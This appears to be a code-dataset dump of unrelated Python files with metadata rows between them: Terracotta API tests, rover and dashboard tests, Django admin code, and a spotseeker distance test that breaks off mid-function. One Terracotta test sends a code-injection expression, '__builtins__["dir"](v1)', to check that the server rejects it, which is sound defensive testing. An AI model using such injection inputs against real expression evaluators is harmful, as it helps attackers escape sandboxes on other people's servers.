f'r_range={stretch_range}&b_range={stretch_range}&g_range={stretch_range}')
assert rv.status_code == 200, rv.data
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == (*settings.DEFAULT_TILE_SIZE, 3)
def test_get_compute(client, use_testdb, raster_file_xyz):
import terracotta
settings = terracotta.get_settings()
# default tile size
x, y, z = raster_file_xyz
rv = client.get(
f'/compute/val21/x/{z}/{x}/{y}.png'
'?expression=v1*v2&v1=val22&v2=val23'
'&stretch_range=[0,10000]'
)
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == settings.DEFAULT_TILE_SIZE
# custom tile size
rv = client.get(
f'/compute/val21/x/{z}/{x}/{y}.png'
'?expression=v1*v2&v1=val22&v2=val23'
'&stretch_range=[0,10000]'
'&tile_size=[128,128]'
)
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == (128, 128)
def test_get_compute_preview(client, use_testdb):
import terracotta
settings = terracotta.get_settings()
rv = client.get(
'/compute/val21/x/preview.png'
'?expression=v1*v2&v1=val22&v2=val23'
'&stretch_range=[0,10000]'
)
assert rv.status_code == 200
img = Image.open(BytesIO(rv.data))
assert np.asarray(img).shape == settings.DEFAULT_TILE_SIZE
def test_get_compute_invalid(client, use_testdb, raster_file_xyz):
x, y, z = raster_file_xyz
# too few keys
rv = client.get(
f'/compute/val21/{z}/{x}/{y}.png'
'?expression=v1*v2&v1=val22&v2=val23'
'&stretch_range=[0,10000]'
)
assert rv.status_code == 400
# invalid expression
rv = client.get(
'/compute/val21/x/preview.png'
'?expression=__builtins__["dir"](v1)&v1=val22'
'&stretch_range=[0,10000]'
)
assert rv.status_code == 400
# no stretch range
rv = client.get(
f'/compute/val21/x/{z}/{x}/{y}.png'
'?expression=v1*v2&v1=val22&v2=val23'
)
assert rv.status_code == 400
# no expression
rv = client.get(
f'/compute/val21/x/{z}/{x}/{y}.png'
'?stretch_range=[0,10000]'  # valid range, so only the missing expression triggers the 400
)
assert rv.status_code == 400
# missing operand
rv = client.get(
f'/compute/val21/x/{z}/{x}/{y}.png'
'?expression=v1*v2'
'&stretch_range=[0,10000)'
)
assert rv.status_code == 400
# invalid stretch range (syntax)
rv = client.get(
f'/compute/val21/x/{z}/{x}/{y}.png'
'?expression=v1*v2&v1=val22&v2=val23'
'&stretch_range=[0,10000)'
)
assert rv.status_code == 400
# invalid stretch range (value)
rv = client.get(
f'/compute/val21/x/{z}/{x}/{y}.png'
'?expression=v1*v2&v1=val22&v2=val23'
'&stretch_range=[10000,0]'
)
assert rv.status_code == 400
def test_get_colormap(client):
rv = client.get('/colormap?stretch_range=[0,1]&num_values=100')
assert rv.status_code == 200
assert len(json.loads(rv.data)['colormap']) == 100
def test_get_colormap_invalid(client):
rv = client.get('/colormap?stretch_range=[0,1')
assert rv.status_code == 400
def test_get_colormap_extra_args(client):
rv = client.get('/colormap?stretch_range=[0,1]&num_values=100&foo=bar&baz=quz')
assert rv.status_code == 200
assert len(json.loads(rv.data)['colormap']) == 100
def test_get_spec(client):
from terracotta import __version__
rv = client.get('/swagger.json')
assert rv.status_code == 200
assert json.loads(rv.data)
assert __version__ in rv.data.decode('utf-8')
rv = client.get('/apidoc')
assert rv.status_code == 200
assert b'Terracotta' in rv.data
| 30.731415 | 99 | 0.65595 | 1,862 | 12,815 | 4.338883 | 0.086466 | 0.04456 | 0.06127 | 0.10026 | 0.839708 | 0.805793 | 0.762099 | 0.730288 | 0.709494 | 0.646615 | 0 | 0.049904 | 0.188451 | 12,815 | 416 | 100 | 30.805288 | 0.726923 | 0.019664 | 0 | 0.552448 | 0 | 0.020979 | 0.233822 | 0.193497 | 0 | 0 | 0 | 0 | 0.27972 | 1 | 0.104895 | false | 0 | 0.076923 | 0 | 0.188811 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
e05c65974024f19246bfde72289d00cbac7e1014
| 32 |
py
|
Python
|
esperanto_analyzer/web/__init__.py
|
fidelisrafael/esperanto-analyzer
|
af1e8609ec0696e3d1975aa0ba0c88e5f04f8468
|
[
"BSD-2-Clause"
] | 18 |
2018-09-05T00:46:47.000Z
|
2021-12-08T08:54:35.000Z
|
esperanto_analyzer/web/__init__.py
|
fidelisrafael/esperanto-analyzer
|
af1e8609ec0696e3d1975aa0ba0c88e5f04f8468
|
[
"BSD-2-Clause"
] | null | null | null |
esperanto_analyzer/web/__init__.py
|
fidelisrafael/esperanto-analyzer
|
af1e8609ec0696e3d1975aa0ba0c88e5f04f8468
|
[
"BSD-2-Clause"
] | 3 |
2019-03-12T17:54:18.000Z
|
2020-01-11T13:05:03.000Z
|
from .api.server import run_app
| 16 | 31 | 0.8125 | 6 | 32 | 4.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 32 | 1 | 32 | 32 | 0.892857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
0ecfc00a422b2dc3bba9eb71d7782113b804c267
| 4,351 |
py
|
Python
|
tests/services/test_rover_runner_service.py
|
dev-11/mars-rover-challenge
|
67569fcc4b93e5ec4cbe466d7a2fd5b3e9a316b0
|
[
"MIT"
] | null | null | null |
tests/services/test_rover_runner_service.py
|
dev-11/mars-rover-challenge
|
67569fcc4b93e5ec4cbe466d7a2fd5b3e9a316b0
|
[
"MIT"
] | null | null | null |
tests/services/test_rover_runner_service.py
|
dev-11/mars-rover-challenge
|
67569fcc4b93e5ec4cbe466d7a2fd5b3e9a316b0
|
[
"MIT"
] | null | null | null |
import unittest
from services import RoverRunnerService
from tests.test_environment.marses import small_mars_with_one_rover_empty_commands
from tests.test_environment import mocks as m
from data_objects import Rover
class TestRoverRunnerService(unittest.TestCase):
def test_rover_runner_moves_rover_forward(self):
grid = small_mars_with_one_rover_empty_commands.grid
rover = small_mars_with_one_rover_empty_commands.rover_setups[0].rover
tss = m.get_mocked_turn_command_selector_turn_left_from_north_command_only()
mss = m.get_mocked_move_command_selector_north_command_only()
rrs = RoverRunnerService(grid, rover, mss, tss)
final_pos = rrs.run(['M'])
self.assertEqual(Rover(0, 1, 'N'), final_pos)
def test_rover_runner_turns_rover_left(self):
grid = small_mars_with_one_rover_empty_commands.grid
rover = small_mars_with_one_rover_empty_commands.rover_setups[0].rover
tss = m.get_mocked_turn_command_selector_turn_left_from_north_command_only()
mss = m.get_mocked_move_command_selector_north_command_only()
rrs = RoverRunnerService(grid, rover, mss, tss)
final_pos = rrs.run(['L'])
self.assertEqual(Rover(0, 0, 'W'), final_pos)
def test_rover_runner_turns_rover_right(self):
grid = small_mars_with_one_rover_empty_commands.grid
rover = small_mars_with_one_rover_empty_commands.rover_setups[0].rover
tss = m.get_mocked_turn_command_selector_turn_right_from_north_command_only()
mss = m.get_mocked_move_command_selector_north_command_only()
rrs = RoverRunnerService(grid, rover, mss, tss)
final_pos = rrs.run(['R'])
self.assertEqual(Rover(0, 0, 'E'), final_pos)
def test_rover_runner_goes_off_grid_east(self):
grid = small_mars_with_one_rover_empty_commands.grid
rover = Rover(1, 1, "E")
tss = m.get_mocked_turn_command_selector_turn_right_from_north_command_only()
mss = m.get_mocked_move_command_selector_east_command_only()
rrs = RoverRunnerService(grid, rover, mss, tss)
self.assertRaises(ValueError, rrs.run, ['M'])
def test_rover_runner_goes_off_grid_north(self):
grid = small_mars_with_one_rover_empty_commands.grid
rover = Rover(1, 1, "N")
tss = m.get_mocked_turn_command_selector_turn_right_from_north_command_only()
mss = m.get_mocked_move_command_selector_north_command_only()
rrs = RoverRunnerService(grid, rover, mss, tss)
self.assertRaises(ValueError, rrs.run, ['M'])
def test_rover_runner_goes_off_grid_west(self):
grid = small_mars_with_one_rover_empty_commands.grid
rover = Rover(0, 1, "W")
tss = m.get_mocked_turn_command_selector_turn_right_from_north_command_only()
mss = m.get_mocked_move_command_selector_west_command_only()
rrs = RoverRunnerService(grid, rover, mss, tss)
self.assertRaises(ValueError, rrs.run, ['M'])
def test_rover_runner_goes_off_grid_south(self):
grid = small_mars_with_one_rover_empty_commands.grid
rover = Rover(0, 0, "S")
tss = m.get_mocked_turn_command_selector_turn_right_from_north_command_only()
mss = m.get_mocked_move_command_selector_south_command_only()
rrs = RoverRunnerService(grid, rover, mss, tss)
self.assertRaises(ValueError, rrs.run, ['M'])
def test_rover_runner_does_nothing_empty_command(self):
grid = small_mars_with_one_rover_empty_commands.grid
rover = small_mars_with_one_rover_empty_commands.rover_setups[0].rover
tss = m.get_mocked_turn_command_selector_turn_left_from_north_command_only()
mss = m.get_mocked_move_command_selector_north_command_only()
rrs = RoverRunnerService(grid, rover, mss, tss)
final_pos = rrs.run([])
self.assertEqual(rover, final_pos)
def test_rover_runner_raises_error_for_None_command(self):
grid = small_mars_with_one_rover_empty_commands.grid
rover = small_mars_with_one_rover_empty_commands.rover_setups[0].rover
tss = m.get_mocked_turn_command_selector_turn_left_from_north_command_only()
mss = m.get_mocked_move_command_selector_north_command_only()
rrs = RoverRunnerService(grid, rover, mss, tss)
self.assertRaises(TypeError, rrs.run, None)
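For orientation, the behavior these tests pin down can be reproduced by a small self-contained sketch (hypothetical names throughout; the real RoverRunnerService takes injected move/turn command selectors and a Grid, which the mocks above stand in for):

from dataclasses import dataclass, replace

@dataclass(frozen=True)
class Rover:
    x: int
    y: int
    facing: str

LEFT = {"N": "W", "W": "S", "S": "E", "E": "N"}
RIGHT = {v: k for k, v in LEFT.items()}
MOVES = {"N": (0, 1), "E": (1, 0), "S": (0, -1), "W": (-1, 0)}

def run(rover, commands, width, height):
    if commands is None:
        raise TypeError("commands must be an iterable of 'L'/'R'/'M'")
    for command in commands:
        if command == "L":
            rover = replace(rover, facing=LEFT[rover.facing])
        elif command == "R":
            rover = replace(rover, facing=RIGHT[rover.facing])
        elif command == "M":
            dx, dy = MOVES[rover.facing]
            rover = replace(rover, x=rover.x + dx, y=rover.y + dy)
        if not (0 <= rover.x <= width and 0 <= rover.y <= height):
            raise ValueError("rover left the grid")
    return rover

assert run(Rover(0, 0, "N"), ["M"], 1, 1) == Rover(0, 1, "N")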
| 51.188235 | 85 | 0.746495 | 615 | 4,351 | 4.77561 | 0.117073 | 0.055158 | 0.061287 | 0.081716 | 0.872319 | 0.857337 | 0.845761 | 0.824311 | 0.799796 | 0.799796 | 0 | 0.005294 | 0.175132 | 4,351 | 84 | 86 | 51.797619 | 0.81304 | 0 | 0 | 0.575342 | 0 | 0 | 0.003218 | 0 | 0 | 0 | 0 | 0 | 0.123288 | 1 | 0.123288 | false | 0 | 0.068493 | 0 | 0.205479 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
0ee6801d23fab1803ee54e727965d043d1914412
| 224 |
py
|
Python
|
comcenterproject/project/helpers.py
|
tongpa/bantak_program
|
66edfe225e8018f65c9c5a6cd7745c17ba557bd5
|
[
"Apache-2.0"
] | null | null | null |
comcenterproject/project/helpers.py
|
tongpa/bantak_program
|
66edfe225e8018f65c9c5a6cd7745c17ba557bd5
|
[
"Apache-2.0"
] | null | null | null |
comcenterproject/project/helpers.py
|
tongpa/bantak_program
|
66edfe225e8018f65c9c5a6cd7745c17ba557bd5
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""WebHelpers used in project."""
#from webhelpers import date, feedgenerator, html, number, misc, text
from markupsafe import Markup
def bold(text):
return Markup('<strong>%s</strong>' % text)
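One caveat worth noting: formatting with % before wrapping in Markup marks the interpolated text as already-safe, so untrusted input is not escaped. A sketch of the escaping variant using markupsafe's interpolation, shown for contrast rather than as a change to the project helper:

from markupsafe import Markup

def bold_escaped(text):
    # interpolating through a Markup template escapes `text` first
    return Markup('<strong>%s</strong>') % text

assert bold_escaped('<i>') == Markup('<strong>&lt;i&gt;</strong>')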
| 24.888889 | 69 | 0.6875 | 29 | 224 | 5.310345 | 0.758621 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005263 | 0.151786 | 224 | 9 | 70 | 24.888889 | 0.805263 | 0.526786 | 0 | 0 | 0 | 0 | 0.19 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 |
0
| 6 |
163ee50e70aae9c38787e48d9c60c83c946fac91
| 9,923 |
py
|
Python
|
tests/integration_tests/test_dashboards.py
|
hugocool/explainerdashboard
|
e725528c3d94a1a45b51bd9632686d0697274f54
|
[
"MIT"
] | 1 |
2021-11-19T09:30:56.000Z
|
2021-11-19T09:30:56.000Z
|
tests/integration_tests/test_dashboards.py
|
hugocool/explainerdashboard
|
e725528c3d94a1a45b51bd9632686d0697274f54
|
[
"MIT"
] | null | null | null |
tests/integration_tests/test_dashboards.py
|
hugocool/explainerdashboard
|
e725528c3d94a1a45b51bd9632686d0697274f54
|
[
"MIT"
] | null | null | null |
import dash
from catboost import CatBoostClassifier, CatBoostRegressor
from xgboost import XGBClassifier, XGBRegressor
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor
from explainerdashboard.explainers import ClassifierExplainer, RegressionExplainer
from explainerdashboard.datasets import titanic_survive, titanic_fare, titanic_embarked, titanic_names
from explainerdashboard.dashboards import ExplainerDashboard
def get_classification_explainer(xgboost=False, include_y=True):
X_train, y_train, X_test, y_test = titanic_survive()
if xgboost:
model = XGBClassifier().fit(X_train, y_train)
else:
model = RandomForestClassifier(n_estimators=50, max_depth=10).fit(X_train, y_train)
if include_y:
explainer = ClassifierExplainer(
model, X_test, y_test,
cats=['Sex', 'Deck', 'Embarked'],
labels=['Not survived', 'Survived'])
else:
explainer = ClassifierExplainer(
model, X_test,
cats=['Sex', 'Deck', 'Embarked'],
labels=['Not survived', 'Survived'])
explainer.calculate_properties()
return explainer
def get_regression_explainer(xgboost=False, include_y=True):
X_train, y_train, X_test, y_test = titanic_fare()
train_names, test_names = titanic_names()
if xgboost:
model = XGBRegressor().fit(X_train, y_train)
else:
model = RandomForestRegressor(n_estimators=50, max_depth=10).fit(X_train, y_train)
if include_y:
reg_explainer = RegressionExplainer(model, X_test, y_test,
cats=['Sex', 'Deck', 'Embarked'],
idxs=test_names,
units="$")
else:
reg_explainer = RegressionExplainer(model, X_test,
cats=['Sex', 'Deck', 'Embarked'],
idxs=test_names,
units="$")
reg_explainer.calculate_properties()
return reg_explainer
def get_multiclass_explainer(xgboost=False, include_y=True):
X_train, y_train, X_test, y_test = titanic_embarked()
train_names, test_names = titanic_names()
if xgboost:
model = XGBClassifier().fit(X_train, y_train)
else:
model = RandomForestClassifier(n_estimators=50, max_depth=10).fit(X_train, y_train)
if include_y:
if xgboost:
multi_explainer = ClassifierExplainer(model, X_test, y_test,
model_output='logodds',
cats=['Sex', 'Deck'],
labels=['Queenstown', 'Southampton', 'Cherbourg'])
else:
multi_explainer = ClassifierExplainer(model, X_test, y_test,
cats=['Sex', 'Deck'],
labels=['Queenstown', 'Southampton', 'Cherbourg'])
else:
if xgboost:
multi_explainer = ClassifierExplainer(model, X_test,
model_output='logodds',
cats=['Sex', 'Deck'],
labels=['Queenstown', 'Southampton', 'Cherbourg'])
else:
multi_explainer = ClassifierExplainer(model, X_test,
cats=['Sex', 'Deck'],
labels=['Queenstown', 'Southampton', 'Cherbourg'])
multi_explainer.calculate_properties()
return multi_explainer
def get_catboost_classifier():
X_train, y_train, X_test, y_test = titanic_survive()
train_names, test_names = titanic_names()
model = CatBoostClassifier(iterations=100, verbose=0).fit(X_train, y_train)
explainer = ClassifierExplainer(
model, X_test, y_test,
cats=[{'Gender': ['Sex_female', 'Sex_male', 'Sex_nan']},
'Deck', 'Embarked'],
labels=['Not survived', 'Survived'],
idxs=test_names)
X_cats, y_cats = explainer.X_merged, explainer.y.astype("int")
model = CatBoostClassifier(iterations=5, verbose=0).fit(X_cats, y_cats, cat_features=[5, 6, 7])
explainer = ClassifierExplainer(model, X_cats, y_cats, idxs=X_test.index)
explainer.calculate_properties(include_interactions=False)
return explainer
def get_catboost_regressor():
X_train, y_train, X_test, y_test = titanic_fare()
model = CatBoostRegressor(iterations=5, verbose=0).fit(X_train, y_train)
explainer = RegressionExplainer(model, X_test, y_test,
cats=["Sex", 'Deck', 'Embarked'])
X_cats, y_cats = explainer.X_merged, explainer.y
model = CatBoostRegressor(iterations=5, verbose=0).fit(X_cats, y_cats, cat_features=[5, 6, 7])
explainer = RegressionExplainer(model, X_cats, y_cats, idxs=X_test.index)
explainer.calculate_properties(include_interactions=False)
return explainer
def test_classification_dashboard(dash_duo):
explainer = get_classification_explainer()
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=30)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_regression_dashboard(dash_duo):
explainer = get_regression_explainer()
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=20)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_simple_classification_dashboard(dash_duo):
explainer = get_classification_explainer()
db = ExplainerDashboard(explainer, title="testing", responsive=False, simple=True)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("#simple-classifier-composite-title", "testing", timeout=20)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_simple_regression_dashboard(dash_duo):
explainer = get_regression_explainer()
db = ExplainerDashboard(explainer, title="testing", responsive=False, simple=True)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("#simple-regression-composite-title", "testing", timeout=20)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_multiclass_dashboard(dash_duo):
explainer = get_multiclass_explainer()
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=30)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_xgboost_classification_dashboard(dash_duo):
explainer = get_classification_explainer(xgboost=True)
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=30)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_xgboost_regression_dashboard(dash_duo):
explainer = get_regression_explainer(xgboost=True)
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=30)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_xgboost_multiclass_dashboard(dash_duo):
explainer = get_multiclass_explainer(xgboost=True)
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=30)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_classification_dashboard_no_y(dash_duo):
explainer = get_classification_explainer(include_y=False)
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=30)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_regression_dashboard_no_y(dash_duo):
explainer = get_regression_explainer(include_y=False)
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=30)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_multiclass_dashboard_no_y(dash_duo):
explainer = get_multiclass_explainer(include_y=False)
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=30)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_catboost_classification_dashboard(dash_duo):
explainer = get_catboost_classifier()
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=30)
assert dash_duo.get_logs() == [], "browser console should contain no error"
def test_catboost_regression_dashboard(dash_duo):
explainer = get_catboost_regressor()
db = ExplainerDashboard(explainer, title="testing", responsive=False)
dash_duo.start_server(db.app)
dash_duo.wait_for_text_to_equal("h1", "testing", timeout=30)
assert dash_duo.get_logs() == [], "browser console should contain no error"
| 44.698198 | 102 | 0.665121 | 1,141 | 9,923 | 5.491674 | 0.099912 | 0.058091 | 0.014523 | 0.024896 | 0.855889 | 0.855889 | 0.818864 | 0.802107 | 0.714172 | 0.668209 | 0 | 0.008513 | 0.230575 | 9,923 | 222 | 103 | 44.698198 | 0.812181 | 0 | 0 | 0.647727 | 0 | 0 | 0.113284 | 0.006853 | 0 | 0 | 0 | 0 | 0.073864 | 1 | 0.102273 | false | 0 | 0.039773 | 0 | 0.170455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
16a329d42e5fe4d870ae6840dac571c4c4bd741b
| 221 |
py
|
Python
|
ImageSearcher/admin.py
|
carpensa/dicom-harpooner
|
2d998c22c51e372fb9b5f3508c900af6f4405cd3
|
[
"BSD-3-Clause"
] | 1 |
2021-05-24T21:45:05.000Z
|
2021-05-24T21:45:05.000Z
|
ImageSearcher/admin.py
|
carpensa/dicom-harpooner
|
2d998c22c51e372fb9b5f3508c900af6f4405cd3
|
[
"BSD-3-Clause"
] | null | null | null |
ImageSearcher/admin.py
|
carpensa/dicom-harpooner
|
2d998c22c51e372fb9b5f3508c900af6f4405cd3
|
[
"BSD-3-Clause"
] | null | null | null |
from django.contrib import admin
from dicoms.models import Subject
from dicoms.models import Session
from dicoms.models import Series
admin.site.register(Session)
admin.site.register(Subject)
admin.site.register(Series)
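An equivalent registration using Django's decorator form, shown only as an illustrative alternative (the explicit register() calls above behave the same):

from django.contrib import admin
from dicoms.models import Subject, Session, Series

@admin.register(Subject, Session, Series)
class DicomAdmin(admin.ModelAdmin):
    pass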
| 24.555556 | 33 | 0.837104 | 32 | 221 | 5.78125 | 0.375 | 0.162162 | 0.259459 | 0.356757 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090498 | 221 | 8 | 34 | 27.625 | 0.920398 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.571429 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
bc5ea9e7a84513ea2108b53d14947d94915f3a05
| 26 |
py
|
Python
|
__init__.py
|
mschrimpf/CapsNetKeras
|
4c514860bf6689fb1772a7bd858638cd538ff22f
|
[
"MIT"
] | null | null | null |
__init__.py
|
mschrimpf/CapsNetKeras
|
4c514860bf6689fb1772a7bd858638cd538ff22f
|
[
"MIT"
] | null | null | null |
__init__.py
|
mschrimpf/CapsNetKeras
|
4c514860bf6689fb1772a7bd858638cd538ff22f
|
[
"MIT"
] | null | null | null |
from .capsulenet import *
| 13 | 25 | 0.769231 | 3 | 26 | 6.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 26 | 1 | 26 | 26 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
bca685ecc21d97e8e24f16ef46f6aaabe24a9d13
| 21,795 |
py
|
Python
|
spotseeker_server/test/search/distance.py
|
uw-it-aca/spotseeker_server
|
1d8a5bf98b76fdcb807ed4cd32f939bb7e9aa66c
|
[
"Apache-2.0"
] | 5 |
2015-03-12T00:36:33.000Z
|
2022-02-24T16:41:25.000Z
|
spotseeker_server/test/search/distance.py
|
uw-it-aca/spotseeker_server
|
1d8a5bf98b76fdcb807ed4cd32f939bb7e9aa66c
|
[
"Apache-2.0"
] | 133 |
2016-02-03T23:54:45.000Z
|
2022-03-30T21:33:58.000Z
|
spotseeker_server/test/search/distance.py
|
uw-it-aca/spotseeker_server
|
1d8a5bf98b76fdcb807ed4cd32f939bb7e9aa66c
|
[
"Apache-2.0"
] | 6 |
2015-01-07T23:21:15.000Z
|
2017-12-07T08:26:33.000Z
|
# Copyright 2021 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
from django.test import TestCase
from django.conf import settings
from django.test.client import Client
from spotseeker_server.models import Spot
import simplejson as json
from decimal import Decimal
from django.test.utils import override_settings
from mock import patch
from spotseeker_server import models
@override_settings(SPOTSEEKER_AUTH_MODULE="spotseeker_server.auth.all_ok")
class SpotSearchDistanceTest(TestCase):
def test_invalid_latitude(self):
c = Client()
response = c.get(
"/api/v1/spot",
{
"center_latitude": "bad_data",
"center_longitude": -40,
"distance": 10,
},
)
self.assertEquals(
response.status_code, 200, "Accepts a query with bad latitude"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
self.assertEquals(
response.content.decode(), "[]", "Should return no matches"
)
def test_invalid_longitude(self):
c = Client()
response = c.get(
"/api/v1/spot",
{
"center_latitude": "30",
"center_longitude": "bad_data",
"distance": "10",
},
)
self.assertEquals(
response.status_code, 200, "Accepts a query with bad longitude"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
self.assertEquals(
response.content.decode(), "[]", "Should return no matches"
)
def test_invalid_height(self):
c = Client()
response = c.get(
"/api/v1/spot",
{
"center_latitude": "30",
"center_longitude": -40,
"height_from_sea_level": "bad_data",
"distance": "10",
},
)
self.assertEquals(
response.status_code, 200, "Accepts a query with bad height"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
self.assertEquals(
response.content.decode(), "[]", "Should return no matches"
)
def test_invalid_distance(self):
c = Client()
response = c.get(
"/api/v1/spot",
{
"center_latitude": "30",
"center_longitude": "-40",
"distance": "bad_data",
},
)
self.assertEquals(
response.status_code, 200, "Accepts a query with bad distance"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
self.assertEquals(
response.content.decode(), "[]", "Should return no matches"
)
def test_large_longitude(self):
c = Client()
response = c.get(
"/api/v1/spot",
{"center_latitude": 30, "center_longitude": 190, "distance": 10},
)
self.assertEquals(
response.status_code,
200,
"Accepts a query with too large longitude",
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
self.assertEquals(
response.content.decode(), "[]", "Should return no matches"
)
def test_large_latitude(self):
c = Client()
response = c.get(
"/api/v1/spot",
{"center_latitude": 100, "center_longitude": -40, "distance": 10},
)
self.assertEquals(
response.status_code,
200,
"Accepts a query with too large latitude",
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
self.assertEquals(
response.content.decode(), "[]", "Should return no matches"
)
def test_large_negative_latitude(self):
c = Client()
response = c.get(
"/api/v1/spot",
{"center_latitude": -100, "center_longitude": -40, "distance": 10},
)
self.assertEquals(
response.status_code,
200,
"Accepts a query with too negative latitude",
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
self.assertEquals(
response.content.decode(), "[]", "Should return no matches"
)
def test_large_negative_longitude(self):
c = Client()
response = c.get(
"/api/v1/spot",
{"center_latitude": 40, "center_longitude": -190, "distance": 10},
)
self.assertEquals(
response.status_code,
200,
"Accepts a query with too negative longitude",
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
self.assertEquals(
response.content.decode(), "[]", "Should return no matches"
)
def test_no_params(self):
c = Client()
response = c.get("/api/v1/spot", {})
self.assertEquals(
response.status_code, 200, "Accepts a query with no params"
)
self.assertEquals(
response["Content-Type"], "application/json", "Has the json header"
)
self.assertEquals(
response.content.decode(), "[]", "Should return no matches"
)
def test_distances(self):
# Spots are in the Atlantic to make them less likely to collide
# with actual spots
center_lat = 30.000000
center_long = -40.000000
# Inner spots are 10 meters away from the center
